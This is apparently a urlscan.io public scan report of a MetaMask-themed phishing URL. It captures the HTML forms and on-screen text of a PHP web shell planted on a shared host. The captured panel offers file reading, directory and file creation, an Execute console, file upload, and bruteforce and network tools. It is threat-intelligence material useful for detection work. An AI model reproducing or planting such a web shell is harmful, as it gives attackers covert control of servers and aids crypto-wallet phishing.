metamask-verify.acoii.com Open in urlscan Pro
170.10.162.180  Public Scan

URL: http://metamask-verify.acoii.com/probation/
Submission Tags: @ecarlesi threat opendir Search All
Submission: On January 15 via api from IT — Scanned from IT

Form analysis 8 forms found in the DOM

Name: mfPOST

<form method="post" name="mf" style="display:none;">
  <input type="hidden" name="a">
  <input type="hidden" name="c">
  <input type="hidden" name="p1">
  <input type="hidden" name="p2">
  <input type="hidden" name="p3">
  <input type="hidden" name="charset">
</form>

Name: filesPOST

<form name="files" method="post"></form>

<form onsubmit="g(null,this.c.value,&quot;&quot;);return false;"><span>Change dir:</span><br><input class="toolsInp" type="text" name="c" value="/home/acoii/metamask-verify.acoii.com/probation/"><input type="submit" value=">>"></form>

<form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type="text" name="f"><input type="submit" value=">>"></form>

<form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>
  <font color="green">(Writeable)</font><br><input class="toolsInp" type="text" name="d"><input type="submit" value=">>">
</form>

<form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>
  <font color="green">(Writeable)</font><br><input class="toolsInp" type="text" name="f"><input type="submit" value=">>">
</form>

<form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type="text" name="c" value=""><input type="submit" value=">>"></form>

POST

<form method="post" enctype="multipart/form-data">
  <input type="hidden" name="a" value="FilesMAn">
  <input type="hidden" name="c" value="/home/acoii/metamask-verify.acoii.com/probation/">
  <input type="hidden" name="p1" value="uploadFile">
  <input type="hidden" name="charset" value="Windows-1251">
  <span>Upload file:</span>
  <font color="green">(Writeable)</font><br><input class="toolsInp" type="file" name="f"><input type="submit" value=">>">
</form>

Text Content

Uname:
User:
Php:
Hdd:
Cwd:Linux altar48.supremepanel48.com 3.10.0-962.3.2.lve1.5.77.el7.x86_64 #1 SMP
Mon Dec 12 07:06:14 EST 2022 x86_64 [exploit-db.com]
1277 ( acoii ) Group: 1278 ( acoii )
7.0.33 Safe mode: OFF [ phpinfo ] Datetime: 2024-01-15 01:34:25
3023.58 GB Free: 505.69 GB (16%)
/home/acoii/metamask-verify.acoii.com/probation/ drwxrwxrwx [ home ]
UTF-8Windows-1251KOI8-RKOI8-Ucp866
Server IP:
170.10.162.180
Client IP:
185.198.62.224

[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ String tools ][ Bruteforce ][
Network ][ Self remove ]


FILE MANAGER


NameSizeModifyOwner/GroupPermissionsActions[ . ]dir2024-01-15
01:17:10acoii/acoiidrwxrwxrwxR T[ .. ]dir2022-12-30
07:23:51acoii/nobodydrwxr-x---R Terror_log2.86 KB2024-01-15
01:34:25acoii/acoii-rw-r--r--R T E Dindex.php29.74 KB2022-12-30
07:23:51acoii/acoii-rw-r--r--R T E D CopyMoveDeleteCompress (zip)Uncompress
(zip)Compress (tar.gz) 

Change dir:

Read file:

Make dir: (Writeable)

Make file: (Writeable)

Execute:

Upload file: (Writeable)